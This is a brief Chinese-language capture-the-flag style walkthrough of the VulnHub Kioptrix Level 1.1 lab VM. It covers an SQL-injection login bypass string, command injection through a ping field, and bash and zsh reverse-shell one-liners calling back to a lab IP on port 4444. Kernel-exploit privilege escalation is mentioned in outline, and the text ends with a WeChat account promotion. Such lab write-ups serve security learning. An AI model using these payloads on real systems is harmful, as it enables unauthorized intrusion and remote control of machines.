下载地址
https://www.vulnhub.com/entry/kioptrix-level-11-2,23
信息搜集
扫描IP地址
扫描端口
80端口
万能密码登录
用户名:admin’or ‘1’ = '1 --+ 密码随便写
登录成功
命令执行漏洞
输入127.0.0.1 | ls 成功执行命令
反弹shell
使用bash反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'
使用zsh反弹shell
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.140 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
kali 开启监听
浏览器输入:127.0.0.1 | bash -c ‘exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1’
成功拿到shell
提权
查看内核版本
搜索exp
将exp上传到靶机
编译exp,执行exp,成功提权到root
本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取!